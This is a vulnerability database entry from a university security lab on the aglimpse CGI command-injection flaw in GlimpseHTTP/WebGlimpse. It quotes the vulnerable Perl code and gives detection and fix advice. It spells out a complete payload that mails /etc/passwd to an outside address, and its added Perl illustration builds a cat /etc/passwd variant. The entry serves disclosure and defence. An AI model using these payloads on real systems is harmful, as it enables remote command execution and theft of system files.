AGlimpse meta-characters

DOVES Vulnerability V-00100

DOVES Project
Computer Security Laboratory
Department of Computer Science
University of California at Davis



Description

Brief summary: The GlimpseHTTP package does not check its input adequately, allowing remote users to insert shell metacharacters and force the web server to execute arbitrary commands.

Detailed description: GlimpseHTTP and WebGlimpse are popular collections of tools that provide an easy-to-use interface to glimpse, an indexing and query system, in order to offer a search facility on web sites. Neither GlimpseHTTP nor WebGlimpse checks its input for shell metacharacters; the aglimpse CGI script takes part of PATH_INFO and passes it straight into a Perl open() call.

The relevant code is as follows:

$path_info = $ENV{'PATH_INFO'};
$_ = $path_info;

# /<length>/$indexdir/$path is the format of the PATH_INFO

# might as well start the message now
print "Content-type: text/html\n\n";
print "<HTML>\n"; print "<HEAD>\n";

if ( m|^/([0-9]*)(.*)$| ) {
        $length = $1;
        $path = $2;
        $path =~ s|"||g;
} else {
        &err_badargs;
}

$indexdir = substr($path,0,$length);
$relpath = substr($path,$length,length($path));

# print "<br>indexdir=$indexdir<br>relpath=$relpath<br>";

open(CONF,"$indexdir/archive.cfg") || &err_conf;

Note that this splits PATH_INFO into two fields, $length and $path, takes the first $length characters of $path as $indexdir, and then opens "$indexdir/archive.cfg" using the two-argument form of open(). The only filtering applied is the removal of double quotes from $path.

Perl's two-argument open() treats a file name that begins with '|' as a command to run, with whatever is written to the CONF handle delivered to that command's standard input. Since $indexdir is taken verbatim from PATH_INFO, a remote user can make it begin with '|' and the web server will run whatever follows. The attacker sets $length to the length of the payload so that substr() hands the whole payload back as $indexdir. The payload avoids spaces (which would break the HTTP request line) by using the digit 5 as a separator and setting IFS to 5 so that the shell splits words on it. With $indexdir set to

    |IFS=5;CMD=5mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval$CMD;echo

the shell first assigns the command line to CMD (the backslash before '<' keeps the redirection inside the assigned value), then "eval$CMD" is split on IFS into eval, mail and drazvan@pop3.kappa.ro</etc/passwd, which mails /etc/passwd from the host running the web server to the remote user. The trailing echo exists only to absorb the "/archive.cfg" that the script appends to $indexdir.
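The following Perl script is an added illustration and is not code from aglimpse, GlimpseHTTP or WebGlimpse. It re-implements the PATH_INFO split shown above as parse_unsafe(), constructs the attacker's PATH_INFO for a given payload, shows the string that would reach open() and why the two-argument form would treat it as a pipe, and contrasts it with a hardened parse (an allow-list of index directories plus a three-argument open()). The directory names in the allow-list, the helper names and the cat-based payload are assumptions made for this example. Attacker-controlled strings are only inspected, never passed to open() or to a shell; the one command the script runs is a harmless printf under /bin/sh in ifs_demo(), to show the IFS word-splitting trick in isolation.

```perl
#!/usr/bin/perl
# Added illustration for DOVES V-00100; not code from aglimpse or WebGlimpse.
# parse_unsafe() mirrors the vulnerable PATH_INFO split, parse_safe() is a
# hardened replacement. Attacker-controlled strings are only inspected,
# never handed to open() or to a shell.
use strict;
use warnings;

# The aglimpse logic: "/<length><path>", and the first $length characters of
# $path are the index directory. ([0-9]+ here where the original had [0-9]*,
# so that a missing length is rejected instead of merely warned about.)
sub parse_unsafe {
    my ($path_info) = @_;
    return unless $path_info =~ m|^/([0-9]+)(.*)$|;
    my ($length, $path) = ($1, $2);
    $path =~ s|"||g;                       # the only filtering aglimpse did
    my $indexdir = substr($path, 0, $length);
    my $relpath  = substr($path, $length);
    return ($indexdir, $relpath, "$indexdir/archive.cfg");
}

# Two-argument open() runs the name as a command when it starts with "|"
# (we write to its stdin) or ends with "|" (we read its stdout). This checks
# a string against that rule without calling open().
sub would_pipe {
    my ($spec) = @_;
    return ($spec =~ /^\s*\|/ || $spec =~ /\|\s*$/) ? 1 : 0;
}

# Attacker's PATH_INFO: the payload's own length as the digit field, then
# the payload, so substr() returns the entire payload as $indexdir.
sub attack_path_info {
    my ($payload) = @_;
    return sprintf('/%d%s', length($payload), $payload);
}

# Hardened parse. The index directory must be one of a fixed set configured
# by the site (hypothetical names) and the relative path must consist of
# plain slash-separated components with no "..".
my %ALLOWED_INDEXDIR = map { $_ => 1 }
    qw(/usr/local/glimpse/docs /usr/local/glimpse/faq);

sub parse_safe {
    my ($path_info) = @_;
    my ($indexdir, $relpath) = parse_unsafe($path_info);
    return unless defined $indexdir;
    return unless $ALLOWED_INDEXDIR{$indexdir};
    return unless $relpath =~ m{^(?:/[A-Za-z0-9_.-]+)*/?$};
    return if     $relpath =~ m{(?:^|/)\.\.(?:/|$)};
    return ($indexdir, $relpath);
}

# Hardened open: three-argument form with an explicit mode, so the name can
# never be taken as a pipe specification or as "-".
sub open_config {
    my ($indexdir) = @_;
    open(my $conf, '<', "$indexdir/archive.cfg") or return;
    return $conf;
}

# The IFS trick from the report, run under a real /bin/sh with a harmless
# printf: "5" stands in for the spaces that cannot appear in a request path.
sub ifs_demo {
    return `/bin/sh -c 'IFS=5;CMD=5printf5%s5hello;eval\$CMD'`;
}

# Demonstration: a payload shaped like the one in the description (cat
# instead of mail), followed by a legitimate request.
my $payload = '|IFS=5;CMD=5cat5/etc/passwd;eval$CMD;echo';
my $bad     = attack_path_info($payload);
my ($indexdir, $relpath, $spec) = parse_unsafe($bad);
print "PATH_INFO : $bad\n";
print "open() arg: $spec\n";
print "pipe?     : ", (would_pipe($spec) ? "yes" : "no"), "\n";
print "hardened  : ", (parse_safe($bad) ? "accepted" : "rejected"), "\n";

my $good = '/23/usr/local/glimpse/docs/manual/index.html';
my @ok = parse_safe($good);
print "legit     : ", (@ok ? "indexdir=$ok[0] relpath=$ok[1]" : "rejected"), "\n";
print "IFS demo  : ", ifs_demo(), "\n";
```

The hardened parse keeps aglimpse's own length-prefixed format but refuses any $indexdir that is not in the site's configured list, so no string of the attacker's choosing ever reaches open(); the three-argument open() is a second, independent barrier, since with an explicit mode Perl never interprets the name as a pipe.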

Components: GlimpseHTTP, WebGlimpse, aglimpse, cgi-bin, web server

Operating system(s): not known

Effect: Intruders can execute arbitrary commands with the privileges of the web server process.

How to detect: Look for the code above in the aglimpse script shipped with WebGlimpse or GlimpseHTTP, in particular a two-argument open() whose file name is built from PATH_INFO.

How to fix:

  1. Remove or replace the vulnerable scripts:
    1. Disable GlimpseHTTP and WebGlimpse, or
    2. Upgrade to WebGlimpse version 1.5 or later. GlimpseHTTP is no longer supported and should be removed.

Other information: none


Keywords

metacharacter, www, glimpse, web server

Cataloguing Information

Common Vulnerabilities and Exposures: The aglimpse CGI program of the Glimpse package allows remote execution of arbitrary commands [CVE-1999-0147]


Exploits

Attacks: See DOVES exploit #100.


Related Information

CERT Advisory CA-97.25.CGI_metachar, "Sanitizing User-Supplied Data in CGI Scripts", gives general advice on sanitizing user input in CGI scripts that applies here. The Project FUSE web site has a page about GlimpseHTTP security.

Advisories:

Related DOVES entries:


History

Who reported it: Razvan Dragomirescu in Bugtraq on Wed Jul 02 1997 19:32:09


Revision #1

  1. Stacey Anderson on 6/26/2000
    Initial entry


Send email to doves@cs.ucdavis.edu

Department of Computer Science
University of California at Davis
One Shields Ave.
Davis, CA 95616-8562


Page created August 28, 2000 at 16:41:44 GMT
